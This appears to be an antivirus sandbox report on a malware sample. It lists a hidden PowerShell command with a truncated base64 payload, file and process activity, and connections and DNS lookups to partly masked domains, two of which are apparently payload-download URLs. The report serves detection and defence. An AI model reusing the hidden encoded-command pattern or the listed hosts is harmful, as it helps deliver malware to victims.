Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABUAHUAawBlAHAAaQBsAHEAeQBkAD0AJwBEAGIAbQBrAGgAaAB5AGEAaAAnADsAJABKAGUAcABxAG8AbwBzAG8AcwB6AG8AIAA9ACAAJwA5ADAAJwA7ACQAVwBpAGsAYQBwAGgAcgB0AGwAagBnAG4AcwA9ACcAQgBmAHcAawBhAHYAagB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1436
- %TEMP%\1018140.cvr
- 'ng####thanhdat.com':80
- 'hu###omains.com':443
- 'ba####rhotels.com':80
- 'ba####rhotels.com':443
- 'us######aningservice.com':443
- http://ng####thanhdat.com/7f704f63fc2e9eaf8cfc8583aad85562/7Mjj406576/
- http://ba####rhotels.com/cookietest/z979/
- 'hu###omains.com':443
- 'ba####rhotels.com':443
- 'us######aningservice.com':443
- DNS ASK ng####thanhdat.com
- DNS ASK hu###omains.com
- DNS ASK ba####rhotels.com
- DNS ASK it###ezle.com
- DNS ASK 92##bz.com
- DNS ASK us######aningservice.com